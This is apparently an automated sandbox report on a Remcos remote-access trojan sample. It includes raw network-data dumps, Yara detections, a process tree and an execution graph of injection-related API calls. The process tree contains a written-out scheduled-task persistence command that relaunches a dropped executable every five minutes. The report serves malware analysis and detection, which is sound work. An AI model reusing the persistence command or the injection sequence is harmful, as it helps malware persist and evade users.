                                        2024-07-27 09:37:13 UTC680INData Raw: 4d 34 81 eb f9 26 90 8a 04 03 e7 7c 2a 75 15 d4 b8 82 1b 8e ba 0c ac 38 40 23 01 92 97 3c 86 48 00 c5 12 30 1c 4b 6f fe 00 57 80 25 35 25 0c 75 00 ab d3 e5 be d2 20 a5 00 e0 05 4a bd 8d d0 ea 0e 0f 49 b5 24 b2 4b d2 21 07 b2 f3 cb 9b 97 8f 69 c5 e3 a4 ab 7b 70 a0 61 a3 84 84 8d 65 04 9f 74 bd 3d a9 46 b7 84 67 20 62 b5 16 91 d3 ea f7 6d ee eb b1 31 c9 cd 30 24 d6 43 fb 18 fd ef a1 0c 36 24 de b3 83 23 c3 48 45 af 4f b3 ea 14 59 fc c8 a9 51 cf fd 0b e9 fc ea de ab e9 24 48 3a fc 97 53 fb 64 8d 60 15 41 a5 f2 78 48 de e7 27 d6 63 7b 17 63 7d 2a 71 e5 45 2a 7c 09 af ee 6c e5 c7 a3 5e a5 f1 3b 4e e5 46 29 84 9a ac 6f 01 41 07 2b 12 02 6e 49 aa 48 aa 7f 44 04 a1 dc 4a ff e1 d7 15 ff 87 2f d7 ff 84 e7 c4 21 41 4e 3d ff 2f 59 b6 ae 86 b0 67 52 d3 6e d1 2d 59 5e
                                        Data Ascii: M4&|*u8@#<H0KoW%5%u JI$K!i{paet=Fg bm10$C6$#HEOYQ$H:Sd`AxH'c{c}*qE*|l^;NF)oA+nIHDJ/!AN=/YgRn-Y^
                                        2024-07-27 09:37:13 UTC1369INData Raw: 2e 9b b4 da 1e 2b b8 17 30 79 88 ca bd 38 62 f7 00 64 bb 56 1c 08 0a 39 00 e3 89 2b 9d 4c e7 68 00 2e d2 4c eb 93 02 aa 2e b4 c8 dd f7 3f 87 42 50 af 5f 8b 6a bc 75 fa 00 0d a5 21 03 f1 5d 0e 00 f1 9c be cb 95 88 d4 00 b0 ec 44 c8 aa ab 13 2e dd 7f 58 07 29 66 25 cc 9c 40 c1 11 47 14 ff 00 74 07 f9 5c 82 e8 53 00 c6 38 00 4f 2f c6 cf 00 38 65 39 99 8c 64 f6 00 c4 ab 7c 1a 7e 1d 6f 00 14 07 36 6b 9f b2 b3 00 69 96 7a bd c3 e3 63 00 a8 88 5d 41 45 56 35 00 d4 fa 8e 4c 71 b3 57 00 93 5f 8e ff 93 93 3c 00 fd 78 bd 1f 28 f5 8d 00 da 5e 2c 1d e0 d4 55 00 57 07 12 bc 4b 71 57 00 c2 ce cf a2 e8 a0 f3 00 c0 bc 77 45 78 2f 29 00 3a 32 92 52 f7 fe 79 00 1f a6 e3 c5 28 cc 2f 00 7c e2 87 05 44 8c 31 00 2d b6 1d 64 f4 95 a1 00 ba 1a 43 3e a1 02 7b 00 49 12 62 77 45 79
                                        Data Ascii: .+0y8bdV9+Lh.L.?BP_ju!]D.X)f%@Gt\S8O/8e9d|~o6kizc]AEV5LqW_<x(^,UWKqWwEx/):2Ry(/|D1-dC>{IbwEy
                                        2024-07-27 09:37:13 UTC1369INData Raw: d8 76 65 51 00 4c 0b 59 8f 83 e5 2c e6 9e b1 40 69 67 90 aa 7f e2 63 45 34 99 6c 59 cf 0a 1f 00 ef e5 99 e0 48 1d e6 c8 b6 b6 47 6d 9e 4b 85 00 aa e2 67 73 a4 e1 d4 33 09 b5 95 6d df c9 f3 47 0b 69 a1 28 e1 e7 9a 07 1f 07 5c 15 2a a2 af 00 5d a9 0c 85 d9 9a 39 47 db 9a ae d5 ba c8 f6 11 62 24 fb c9 84 7e dc 00 09 0e f0 ad 32 c1 42 e8 5e 26 e9 28 7d 83 82 45 48 c5 b8 96 3e 0b 62 c3 99 72 1f 7e 73 fb 2d 0c 2c 84 5d 0f c7 d9 d7 e8 c8 4b dd 4d 14 e5 29 00 1a 6b c6 30 1a 30 cc 32 30 a8 e7 0d be 0e 3c e8 74 5c bf f7 49 35 d3 d8 60 e8 a7 7a 8c 60 9d 00 30 05 d5 03 74 fa b5 ff 50 90 01 94 c6 3f 35 58 7c d1 8c d8 0f 68 6d 00 cc 7f 5b 06 72 f0 ca 81 80 4a 10 4a f1 65 4e 59 0d 74 b9 46 f7 1c 5d df 36 07 86 db fb 92 cc 00 42 d9 1a 5b eb ce 85 68 8f f3 1f 22 d8 17 b6
                                        Data Ascii: veQLY,@igcE4lYHGmKgs3mGi(\*]9Gb$~2B^&(}EH>br~s-,]KM)k0020<t\I5`z`0tP?5X|hm[rJJeNYtF]6B[h"
                                        2024-07-27 09:37:13 UTC1369INData Raw: 95 e5 b8 3c 87 8f 24 e6 8b 67 bd 25 43 73 00 10 c0 20 b9 1e f9 e4 64 3c 60 23 df b9 85 25 d0 d1 bd 0b e4 c1 3a bf 00 2e 4a ff 91 8b b2 ed 2c d1 1c 33 34 b9 dc 29 8d 0b 67 5d 41 43 8f b0 00 f1 5b 00 a1 08 7f 79 00 c0 21 bf f0 df b0 22 06 c7 b2 7b 39 62 7e 36 24 ed 43 63 32 5d 38 cc e8 45 34 01 68 7d fb 68 88 7d d1 21 ee 84 0e 13 00 13 a8 34 00 47 f1 d4 e8 ab a7 11 02 20 26 ff b8 45 4b 0e 05 d5 85 53 00 61 ab 2f cc cf 4b c4 e8 f5 09 6b 29 5e da 51 47 a9 7c 9f 6b 6a a7 01 4d 3a f8 99 6b 2b 5a bb c8 65 51 e4 f5 38 c3 ed 45 92 e7 12 a1 37 db 0d e8 f2 e3 d0 44 85 2e e1 6b 54 6e 31 90 29 11 2a e8 ab 2f 85 ca 72 a0 d1 e8 b7 a5 ad ec be b1 0d 8d e4 d5 85 ba f5 05 d4 ba cc 55 b9 8e 45 f8 c9 e8 b8 7f e9 5e 41 1d 87 47 64 b6 8c f3 d7 6b db 83 10 1d 48 b1 29 43 af 6b
                                        Data Ascii: <$g%Cs d<`#%:.J,34)g]AC[y!"{9b~6$Cc2]8E4h}h}!4G &EKSa/Kk)^QG|kjM:k+ZeQ8E7D.kTn1)*/rUE^AGdkH)Ck
                                        2024-07-27 09:37:13 UTC1369INData Raw: e9 ec 36 97 8c 22 ed d4 8c 52 41 b0 c3 e8 68 0b 41 97 b7 59 11 69 1b d8 97 55 17 94 9a 69 1a c4 ef a2 9a 93 19 4d f1 d9 bd 8a 69 a2 32 64 d1 9d 46 c3 fb bb dd 5e d4 56 97 22 5c 33 84 b9 f1 49 11 52 0c f5 4c 00 7f 44 65 2b 2f 5c 22 72 f4 ca 8c d6 2b 55 82 00 06 b1 05 61 61 26 95 00 e9 de ee 5f 71 21 69 8b 95 e9 46 c2 15 a5 3f 74 22 e4 7e 8e 40 b8 13 03 18 92 de e1 91 b5 93 00 c9 9d ee ec 64 e2 6f 00 0c ec 7f 03 0b 6e 8f 59 8c cf e5 6b 31 61 7f 45 8e 86 0a 4e 02 1c 32 00 53 51 56 59 9d f9 0c fc 4e e0 76 e0 c2 8f 2a 36 98 b8 be 30 ae 13 52 00 14 75 58 d2 04 c5 9c 11 5b ff f7 dc 18 19 f6 ba df 72 33 f3 99 dc 32 8b 3a 00 c0 32 59 af c8 f1 88 65 06 15 f1 59 a2 6a 43 e9 4c a7 d5 48 da 00 91 91 0f d6 7f e2 bb 74 c7 2a a5 35 69 b1 86 c2 8c e4 d7 de 8d c8 52 6a fb
                                        Data Ascii: 6"RAhAYiUiMi2dF^V"\3IRLDe+/\"r+Uaa&_q!iF?t"~@donYk1aEN2SQVYNv*60RuX[r32:2YeYjCLHt*5iRj
                                        2024-07-27 09:37:13 UTC1369INData Raw: e9 dc 6a cb c4 73 1c 17 48 e6 b5 ad ff e5 61 8e 38 48 d3 50 ff c6 ff d4 4e cd 87 9c 5d bc d0 f6 8b c3 75 f5 00 6f ba 86 b4 0c 03 48 00 02 b0 11 16 c1 79 cf 00 5a f5 13 11 99 1b 19 03 a9 d4 bc 46 23 e9 ed f1 92 e8 40 9b 24 cd b4 8b ee f0 32 c5 e8 a0 0e 50 c0 52 04 9e 32 4a 6b eb 5c 57 ed 8b 5f ab 7f 8b 36 d7 b4 75 11 08 8e 5e ae 38 90 8d a7 b7 96 ff f9 86 a6 26 0a 3d 04 e8 17 c2 e7 9f cb 34 4b 8b 65 05 71 64 30 26 b4 8b aa 48 2b 2f 77 41 3d c8 4a bf 02 4d 67 02 dc 10 4e 96 64 8b de 8b df 02 1b 89 b1 6c 24 de 07 5e 98 7a ab ed c9 ad e4 4f bb 65 78 66 13 d8 b3 c8 77 3f b5 05 07 84 de 3f ba 42 c1 84 af ed e5 02 86 66 79 68 e2 cd d8 e8 67 40 1f ed 6e 09 18 08 5a 84 43 15 0b 7d c9 24 e8 ac 00 04 09 9f 71 ff a7 9a fd 22 37 4e 2f ce 08 dc 70 9c 41 fe e1 04 0c ed
                                        Data Ascii: jsHa8HPN]uoHyZF#@$2PR2Jk\W_6u^8&=4Keqd0&H+/wA=JMgNdl$^zOexfw??Bfyhg@nZC}$q"7N/pA
                                        2024-07-27 09:37:13 UTC1369INData Raw: 10 89 d2 ff 20 28 ee b9 75 10 d7 89 2f e5 d1 44 7b 14 93 03 1d c5 20 21 1b a4 de 59 5a 39 8c 0f 10 82 0f 00 27 b0 71 13 30 e3 36 75 b8 c7 5f 77 2f b0 00 f8 98 02 a6 d1 05 5f 85 ad 9c 48 70 03 b0 7b 6c ff 31 bf 5b cf 71 16 94 f8 a1 a9 97 ff 2e 2f 9a 7e 26 15 31 71 bc 53 2e c2 c6 d6 d4 2e d8 9d 94 8b a4 e7 75 2b f3 69 ca 24 80 58 e3 2e 59 99 6e 08 3b 44 d8 78 a4 0e 95 24 0b 7b 68 51 b3 d7 30 ff 66 8e 4f ca 9c cd e8 ff 1c d0 c6 4e 5c e2 8d c5 94 42 59 8f be c3 52 eb 7a 52 3a ae 24 94 28 e8 a7 98 51 2b 3a ed ba eb 3d f7 ce 96 5b e0 8c 18 0e e6 63 70 ed 22 67 83 3b 65 52 01 2d bf 43 ff d0 23 d2 03 41 be 32 5b 4c 08 bf 26 bd 60 6e 08 83 b3 fb 9c 81 64 d1 ff 62 e2 73 92 1d 40 18 ff 23 f7 ff a6 ee f0 d7 00 92 fd 68 5d 4e 26 69 f7 d8 ae 17 b0 3d f5 3b e8 30 c9 ab
                                        Data Ascii: (u/D{ !YZ9'q06u_w/_Hp{l1[q./~&1qS..u+i$X.Yn;Dx${hQ0fON\BYRzR:$(Q+:=[cp"g;eR-C#A2[L&`ndbs@#h]N&i=;0
                                        2024-07-27 09:37:13 UTC1369INData Raw: 9a c3 cf 02 7d ad 62 26 34 f2 76 af f1 4f 7c 14 78 de ff e0 d4 6e 1f c3 0b ff ff 81 9b 2e 5b fc de 37 f5 53 e9 6b ec d6 0b 53 51 67 7f ef 0b 91 39 eb eb e1 e1 d3 73 7c a1 1e ff 0e 9c 31 c9 a7 21 fc ff c5 6e c2 99 11 d6 c7 ff 18 b0 7a d1 13 57 06 56 78 1c 08 dc 7f 9d 0d ca 9a 2b e6 e8 7e aa 71 e8 f6 64 0c c7 90 b2 94 e8 ba e9 0d cc 62 91 0e c3 5b 8b a6 f8 1e 07 0e e8 5a 19 14 6c 3a bb f1 38 ce 16 ae 91 b5 fc c5 8b 1c ed 89 ea c3 c0 51 f0 57 8c 8b bd 5d dc 21 00 0f c6 7d df 16 27 8a 00 ec d4 ad 94 77 e9 2d 0a 4c 2c c2 6c a2 06 fd 5b bd 20 3c 88 84 eb 42 e8 95 5f a9 97 d9 fe a2 f8 1b bb cb b1 63 a9 56 e8 23 be 67 ad 9c 76 3e e8 b8 c1 0f df da 1f 6b 0c 53 8b 85 23 47 2d 8d 8b 9b 55 12 f2 08 ed bc 8b 93 99 ee 81 7b 76 4b 92 4f ee 8a d9 77 a2 4c e8 d0 63 67 61
                                        Data Ascii: }b&4vO|xn.[7SkSQg9s|1!nzWVx+~qdb[Zl:8QW]!}'w-L,l[ <B_cV#gv>kS#G-U{vKOwLcga
                                        2024-07-27 09:37:13 UTC1369INData Raw: 34 2b f4 c9 db 55 a8 15 e9 00 b9 0b e1 0a b8 69 f6 89 99 00 8b 49 44 44 91 50 a7 4b 86 65 26 24 dc 8b 73 66 ed b4 47 ca 1d 48 b0 f3 e7 18 6c 02 6f ff e2 5a 24 14 d4 a8 55 04 56 78 8a 1a 52 31 fa 83 ff 44 54 8a 49 37 90 00 ad 32 97 e7 94 f8 d6 18 42 c6 0a 4f 92 f8 1a 64 7a 1f f6 fe 59 7d 2a f3 27 e4 cc 97 68 8f 03 dd 71 c3 77 21 eb 0e 34 ce 4f 03 cb a8 36 6e 3d 24 72 2f 97 18 bc be 01 ce 9f 54 66 db 15 43 f8 4c 70 7f ae 18 38 f4 3c 50 ad d7 de 86 f4 21 bc 0c 3f 54 ef bd 09 c0 81 ff 61 ee 32 a3 d4 7b e3 48 b2 24 99 a3 d9 50 74 c4 a6 d1 af 99 8c d8 77 e8 80 9e 46 3e 5c 20 c5 5b 74 dc 6d 4e 76 0a e8 e8 a2 b4 a9 0e b6 d5 09 57 24 14 f8 b8 17 1f 40 ff 22 11 52 fe 70 4a d9 24 56 ca 51 57 26 eb a7 ff 2d 38 70 03 0d 6f 37 53 a5 1e 68 04 84 c9 fc 8b 56 21 a3 d4 02
                                        Data Ascii: 4+UiIDDPKe&$sfGHloZ$UVxR1DTI72BOdzY}*'hqw!4O6n=$r/TfCLp8<P!?Ta2{H$PtwF>\ [tmNvW$@"RpJ$VQW&-8po7ShV!
                                        2024-07-27 09:37:13 UTC1369INData Raw: 55 56 37 e4 d2 cc 9e 09 ef 85 1f d6 2b 02 8d 6e 4c 04 a0 dc 0b 94 8e 5f ff b6 fa 07 e2 30 56 95 e8 8f 87 f9 3f 27 21 75 2c 4f da 0c 44 01 ad ea 24 d0 3b 38 f0 11 0a 2f cf 72 5c 58 fa 9c 96 54 8b 57 3f c8 28 cb 45 b1 89 48 8f 58 cb 65 46 c7 2b 3c 26 3f 62 c8 47 66 00 1d 64 cb 6b 4d c7 8d 2b e2 e3 9a b7 28 9d df 89 6b 59 27 32 c8 d6 8e 24 a6 d8 5e ae e6 44 a4 89 a2 e1 93 75 91 bd 18 ff 0e 71 ff f7 5e 62 70 ed b3 db 0c 25 b5 3e e2 4c 06 4e eb 35 77 55 f3 4c e4 aa ca 15 74 a5 12 ff 5c dd 26 53 f7 3a 36 0e 79 2d bd 04 fb 17 9d 80 89 ed c5 df 9e 6b a8 74 7b b2 d6 76 a6 57 b6 ff 9b 83 15 3c 26 ad b1 8d 4e 43 ef 6f 8d bc 97 e7 67 45 e8 fe c4 d8 17 48 5a 41 d9 94 56 7e dc 4c 9e df 1c b3 62 fb 59 ce 39 05 53 9f b7 9e 7a 70 02 ab 8b c7 17 3e cb 04 47 7d 8e 4c f8 6b
                                        Data Ascii: UV7+nL_0V?'!u,OD$;8/r\XTW?(EHXeF+<&?bGfdkM+(kY'2$^Duq^bp%>LN5wULt\&S:6y-kt{vW<&NCogEHZAV~LbY9Szp>G}Lk


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:05:37:08
                                        Start date:27/07/2024
                                        Path:C:\Users\user\Desktop\41DLTjkmOm.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\Desktop\41DLTjkmOm.exe"
                                        Imagebase:0xc70000
                                        File size:900'608 bytes
                                        MD5 hash:922AEE056087550DAF3F1F73AFE27981
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2247441710.00000000130A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2247441710.00000000130A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2247441710.00000000130A9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:true

                                        Target ID:3
                                        Start time:05:37:12
                                        Start date:27/07/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                        Imagebase:0x280000
                                        File size:262'432 bytes
                                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:05:37:12
                                        Start date:27/07/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                        Imagebase:0xd80000
                                        File size:262'432 bytes
                                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4670639752.0000000001416000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4670994702.0000000002F6F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4670639752.00000000013D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:false

                                        Target ID:5
                                        Start time:05:37:12
                                        Start date:27/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"cmd.exe" /c schtasks /create /tn "WidgetData" /tr "C:\Users\user\AppData\Roaming\Lamsses.exe " /sc minute /mo 5 /f
                                        Imagebase:0x7ff6b4f50000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:05:37:12
                                        Start date:27/07/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:05:37:13
                                        Start date:27/07/2024
                                        Path:C:\Windows\System32\schtasks.exe
                                        Wow64 process (32bit):false
                                        Commandline:schtasks /create /tn "WidgetData" /tr "C:\Users\user\AppData\Roaming\Lamsses.exe " /sc minute /mo 5 /f
                                        Imagebase:0x7ff6a5880000
                                        File size:235'008 bytes
                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:05:37:13
                                        Start date:27/07/2024
                                        Path:C:\Users\user\AppData\Roaming\Lamsses.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\Lamsses.exe
                                        Imagebase:0x270000
                                        File size:900'608 bytes
                                        MD5 hash:922AEE056087550DAF3F1F73AFE27981
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 42%, ReversingLabs
                                        • Detection: 23%, Virustotal, Browse
                                        Reputation:low
                                        Has exited:true

                                        Target ID:9
                                        Start time:05:37:13
                                        Start date:27/07/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                        Imagebase:0xdc0000
                                        File size:262'432 bytes
                                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2253404142.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                        Reputation:high
                                        Has exited:true

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:23.1%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:4.3%
                                          Total number of Nodes:70
                                          Total number of Limit Nodes:6
                                          execution_graph 4334 7ffd34581601 4335 7ffd3458161f 4334->4335 4338 7ffd34580538 4335->4338 4337 7ffd3458168c 4338->4337 4341 7ffd345819c0 4338->4341 4339 7ffd34581a05 4339->4337 4340 7ffd34581d75 InternetOpenA 4342 7ffd34581e12 4340->4342 4341->4339 4341->4340 4342->4337 4387 7ffd345883a8 4388 7ffd345883af WriteProcessMemory 4387->4388 4390 7ffd34588516 4388->4390 4417 7ffd345817df 4418 7ffd345817eb 4417->4418 4419 7ffd34580508 InternetOpenA 4418->4419 4420 7ffd345818ec 4418->4420 4419->4418 4343 7ffd34587ebe 4344 7ffd34587ecd Wow64SetThreadContext 4343->4344 4346 7ffd34588018 4344->4346 4407 7ffd3458053d 4410 7ffd3458054b 4407->4410 4408 7ffd34581a05 4409 7ffd34581d75 InternetOpenA 4411 7ffd34581e12 4409->4411 4410->4408 4410->4409 4391 7ffd345881b5 4392 7ffd345881c3 VirtualAllocEx 4391->4392 4394 7ffd3458830b 4392->4394 4347 7ffd34581091 4348 7ffd345810af 4347->4348 4355 7ffd34580528 4348->4355 4350 7ffd3458112d 4360 7ffd34580518 4350->4360 4352 7ffd34581154 4365 7ffd34580600 4352->4365 4354 7ffd3458117c 4358 7ffd34580531 4355->4358 4356 7ffd34581a05 4356->4350 4357 7ffd34581d75 InternetOpenA 4359 7ffd34581e12 4357->4359 4358->4350 4358->4356 4358->4357 4359->4350 4363 7ffd34580521 4360->4363 4361 7ffd34581a05 4361->4352 4362 7ffd34581d75 InternetOpenA 4364 7ffd34581e12 4362->4364 4363->4352 4363->4361 4363->4362 4364->4352 4368 7ffd34580605 4365->4368 4366 7ffd34581a05 4366->4354 4367 7ffd34581d75 InternetOpenA 4369 7ffd34581e12 4367->4369 4368->4366 4368->4367 4369->4354 4395 7ffd34588079 4396 7ffd34588087 ResumeThread 4395->4396 4398 7ffd34588162 4396->4398 4370 7ffd3458234e 4371 7ffd34582379 InternetReadFile 4370->4371 4373 7ffd345824ed 4371->4373 4399 7ffd3458787a 4400 7ffd3458788f CreateProcessA 4399->4400 4402 7ffd34587cd6 4400->4402 4403 7ffd34581f3a 4405 7ffd34581f65 4403->4405 4404 7ffd34582172 InternetOpenUrlA 4406 7ffd3458223d 4404->4406 4405->4404 4405->4405 4374 7ffd34581897 4375 7ffd345817f9 4374->4375 4377 7ffd345818ec 4375->4377 4378 7ffd34580508 4375->4378 4381 7ffd34580511 4378->4381 4379 7ffd34581a05 4379->4375 4380 7ffd34581d75 InternetOpenA 4382 7ffd34581e12 4380->4382 4381->4375 4381->4379 4381->4380 4382->4375 4383 7ffd345888d3 4384 7ffd345888dd ReadProcessMemory 4383->4384 4386 7ffd34588af1 4384->4386

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 678 7ffd3458234e-7ffd34582377 679 7ffd34582382-7ffd34582435 678->679 680 7ffd34582379-7ffd34582381 678->680 684 7ffd3458245e-7ffd345824eb InternetReadFile 679->684 685 7ffd34582437-7ffd3458245b 679->685 680->679 686 7ffd345824f3-7ffd34582553 684->686 687 7ffd345824ed 684->687 685->684 687->686
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2249837674.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd34580000_41DLTjkmOm.jbxd
                                          Similarity
                                          • API ID: FileInternetRead
                                          • String ID:
                                          • API String ID: 778332206-0
                                          • Opcode ID: 8d374280164ffb129b2fddc03801215bc755fd02765ec251b36525c8c808ed2d
                                          • Instruction ID: 29f0c3e0c1fe495be05d3213c669125d310fa8ac2456c393b5a878bf945f6891
                                          • Opcode Fuzzy Hash: 8d374280164ffb129b2fddc03801215bc755fd02765ec251b36525c8c808ed2d
                                          • Instruction Fuzzy Hash: 09714970908A4C8FDB59DF58C895BE9BBF0FB1A311F1041AED049E7292DB74A885CB81

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2249837674.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd34580000_41DLTjkmOm.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID: @{a4$M_^$M_C$X|a4
                                          • API String ID: 1726664587-2348658062
                                          • Opcode ID: 91de28826a0b9d6b7423e2c0ee4180763a13e827947b8b5eedcc907fc3edd14a
                                          • Instruction ID: e532ba98d4d855276ca9a109dabeedde906da7f0c1d4db7dc7f173e532f8435c
                                          • Opcode Fuzzy Hash: 91de28826a0b9d6b7423e2c0ee4180763a13e827947b8b5eedcc907fc3edd14a
                                          • Instruction Fuzzy Hash: C891E071E0DA8C8FEB95CF6888957ADBBF0FF66310F4441AAD04CE7252DA34A944CB41

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2249837674.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd34580000_41DLTjkmOm.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID: @ia4$@ia4
                                          • API String ID: 963392458-4027851222
                                          • Opcode ID: 712f8e3d4d4656b388859385be1e1597827e24598688336f5a56c3d620b5f40d
                                          • Instruction ID: dc2396be568e82a880966d2d07103c9f5e5f5e5061eb98ec059c232550596eab
                                          • Opcode Fuzzy Hash: 712f8e3d4d4656b388859385be1e1597827e24598688336f5a56c3d620b5f40d
                                          • Instruction Fuzzy Hash: 3CF15D70A18A8D8FDBB8DF18CC95BE977E1FB59311F40412AD84ED7291DF749A408B81

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 580 7ffd34580538-7ffd34581a03 585 7ffd34581a5a-7ffd34581b20 580->585 586 7ffd34581a05-7ffd34581a07 580->586 601 7ffd34581baf-7ffd34581c00 585->601 602 7ffd34581b26-7ffd34581b5b 585->602 587 7ffd34581a11-7ffd34581a17 586->587 588 7ffd34581a09-7ffd34581a0c call 7ffd34580620 586->588 590 7ffd34581a19-7ffd34581a44 587->590 591 7ffd34581a46-7ffd34581a59 587->591 588->587 590->591 605 7ffd34581c8f-7ffd34581cce 601->605 606 7ffd34581c06-7ffd34581c3b 601->606 602->601 609 7ffd34581b5d-7ffd34581b67 602->609 611 7ffd34581cd4-7ffd34581d09 605->611 612 7ffd34581d5d-7ffd34581e10 InternetOpenA 605->612 606->605 619 7ffd34581c3d-7ffd34581c47 606->619 613 7ffd34581ba1-7ffd34581ba9 609->613 614 7ffd34581b69-7ffd34581b7c 609->614 611->612 630 7ffd34581d0b-7ffd34581d15 611->630 624 7ffd34581e12 612->624 625 7ffd34581e18-7ffd34581e8d call 7ffd34581ea9 612->625 613->601 616 7ffd34581b80-7ffd34581b93 614->616 617 7ffd34581b7e 614->617 616->616 620 7ffd34581b95-7ffd34581b9d 616->620 617->616 622 7ffd34581c81-7ffd34581c89 619->622 623 7ffd34581c49-7ffd34581c5c 619->623 620->613 622->605 627 7ffd34581c60-7ffd34581c73 623->627 628 7ffd34581c5e 623->628 624->625 641 7ffd34581e94-7ffd34581ea8 625->641 642 7ffd34581e8f 625->642 627->627 631 7ffd34581c75-7ffd34581c7d 627->631 628->627 633 7ffd34581d4f-7ffd34581d57 630->633 634 7ffd34581d17-7ffd34581d2a 630->634 631->622 633->612 636 7ffd34581d2e-7ffd34581d41 634->636 637 7ffd34581d2c 634->637 636->636 639 7ffd34581d43-7ffd34581d4b 636->639 637->636 639->633 642->641
                                          APIs
                                          Memory Dump Source
